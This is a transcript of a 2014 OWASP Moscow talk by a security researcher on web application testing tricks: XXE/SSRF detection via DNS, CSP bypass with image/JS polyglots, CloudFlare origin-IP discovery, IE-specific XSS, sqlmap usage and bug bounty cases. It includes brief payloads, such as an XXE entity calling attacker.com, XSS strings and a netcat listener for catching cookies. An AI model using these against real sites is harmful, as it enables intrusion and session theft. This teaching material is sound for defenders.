"Трюки при анализе защищенности веб приложений – продвинутая версия", Сергей Белов

Transcript

1. Трюки при анализе защищенности веб-приложений - продвинутая версия Сергей Белов

   Digital Security OWASP Moscow, 6 Dec 2014

2. Work/Activity BugHuting Speaker Hey 2

3. XXE/SSRF detection via DNS

4. XXE/SSRF detection via DNS SSRF: 1) Предложить сайт <ссылка на

   сайт> 2) Бот проверяет сайт 3) Вместо внешнего сайта подставляется локальный адрес / заменяется схема (file:///)

5. XXE/SSRF detection via DNS XXE: 1) XML <?xml version="1.0" encoding="ISO-8859-1"?>

   2) С сущностью <!ENTITY xxe SYSTEM «http://attacker.com» >]> 3) Парсер пытается подгрузить сущность с внешнего сайта

6. XXE/SSRF detection via DNS Сложности при поиске: 1) Есть или

   нет? 2) Время запроса 3) Firewall 4) Другие ограничения

7. XXE/SSRF detection via DNS DNS leak DNS server

8. XXE/SSRF detection via DNS В ссылке есть домен -> должен

   быть resolve домена

9. XXE/SSRF detection via DNS Инструкция 1) Свой сервер (VPS) –

   12.34.56.78 1) Ставим attacker.com свои NS сервера NS1: 12.34.56.78; NS2: 12.34.56.78 2) dnschef 3) python dnschef.py -i 0.0.0.0

10. XXE/SSRF detection via DNS Реальный пример Говорят – переходит по

    ссылкам в чате...

11. XXE/SSRF detection via DNS Сценарий 1 1) User 1 ->

    User 2 http://skype-example.com 2) # cat access.log | grep “skype-example” | wc –l 3) 0 

12. XXE/SSRF detection via DNS Сценарий 2 – DNS Поймали :]

13. CSP bypass – js as image

14. CSP bypass – js as image

15. CSP bypass – js as image Картинка == js файл

    Gif injector - http://pastebin.com/6yUbfGX5

16. CSP bypass – js as image 1) Возможность загружать файлы

    на разрешенные домены в CSP 2) Загрузить картинку<->js и сделать инклуд <script src=“.../image.gif”></script> Свежие хромы научились блочить подобное 

17. CloudFlare – real IP detection

18. CloudFlare – real IP detection

19. CloudFlare – real IP detection

20. CloudFlare – real IP detection CloudFlare Free, Pro and Business

    plan: We do not proxy wildcard records CloudFlare Enterprise: For CloudFlare Enterprise customers, we do proxy wildcard records

21. CloudFlare – real IP detection ping randoOm.victim.com => REAL IP

22. XSS && urlencode

23. XSS & urlencode Web Server ?xss=<script>alert(1)</script>

24. XSS & urlencode 1) Не все web серверы выполняют urldecode

    2)  XSS подставляется, но после urlencode 3) XSS не выполняется  4) На помощь приходит... IE!

25. XSS & urlencode Только после знака вопроса

26. XSS & urlencode А если... http://domain.com/path/<xss_here>/etc/

27. XSS & urlencode http://domain.com/path/<xss>/etc/ IE Only (v11 inc): header("Location: http://domain.com/path/<xss>/etc/");

28. XSS & urlencode

29. SQLmap

30. SQLmap

31. SQLmap -u http://vuln.com/vote.php --data="id=1&hash=2“ --eval="import hashlib;hash=hashlib.md5(‘123$id456').hexdigest()"

32. Сложных ситуации - bugbounty

33. Situation #1 – Same Site Scripting XXXYYYZZZ.target.com => 127.0.0.1 What’s

    wrong?

34. Situation #1 – Same Site Scripting

35. Situation #1 – Same Site Scripting External IP – 12.34.56.78

    Loopback – 127.0.0.1

36. Situation #1 – Same Site Scripting Attacker: 1) nc –lv

    10024 2) email to [email protected] with <img src = http://xxyyzz.target.com:10024 > Victim: 1) Open email and... 2) Load image with *.target.com cookies! (that’s is why important to know howto correctly set cookies - http://habrahabr.ru/post/143276/)

37. Situation #1 – Same Site Scripting http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.s html

38. Situation #1 – Same Site Scripting 38 XXXYYYZZZ.target.com => 10.0.0.22

    http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html

39. Situation #1 – Same Site Scripting 39 https://hackerone.com/reports/1509 - $100

40. Situation #2 – Self XSS

41. Situation #2 – Self XSS XSS only for you –

    no impact?

42. Situation #2 – Self XSS

43. Situation #2 – Self XSS Requirements: 1)CSRF for logout O_o

    2)CSRF for login o_O

44. Situation #2 – Self XSS Steps: 1) Save (self)XSS for

    you 2) Logout victim 3) Login victim w/ your creds 4) Draw window 5) Catch user’s creds!

45. Situation #2 – Self XSS Google and self-XSS

46. Situation #2 – Self XSS Share account and attack your

    victim

47. Situation #3 – evil HTTP referers

48. Situation #3 - HTTP referer <a href=“http://external.com”>Go!</a> In request headers:

    ... Referer: http://yoursite.com/ ... But what about external resources on web page such as images, styles...?

49. Situation #3 - HTTP referer http://super-website.com/user/passRecovery?t=SECRET ... <img src=http://comics-are-awesome.com/howto-choose- password.jpg>

    ... Owner of comics-are-awesome.com know all _SECRET_ tokens (from referer)!

50. Situation #3 - HTTP referer https://hackerone.com/reports/738 - $100

51. Situation #5 - Content-Security-Policy

52. Situation #5 - Content-Security-Policy

53. Situation #5 - Content-Security-Policy CSP only for some browsers! Is

    it ok?

54. Situation #5 - Content-Security-Policy 1) Forks with diff UA 2)

    Proxy cache 3) Load balancer... Bug hunter got $100, but...

55. Situation #5 - Content-Security-Policy Fail! Why: • ‘Partial support in

    Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header. • Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages. • Chrome for iOS fails to render pages without a connect-src 'self' policy. • Old FF problems (some versions between XX and YY)

56. Situation #6 - Usernames

57. Situation #6 - Usernames http://website.com/username

58. Situation #6 - Usernames Okay! Let’s register: http://website.com/robots.txt http://website.com/sitemap.xml ...

59. Situations XXX

60. Situations XXX • Info disclose via CSS files (full path

    disclosure while compilation - file\:\/\/\/applications\/hackerone\/releases\/201402211759 29\/app\/assets\/stylesheets\/application\/browser-not- supported\.scss (bug #2221) • SPF and same records • Short tokens • Pixel flood attack • CSRF for login/logout!? (hi Michal Zalewski!) • ... - https://hackerone.com/security?show_all=true

61. Thanks! Questions? @sergeybelove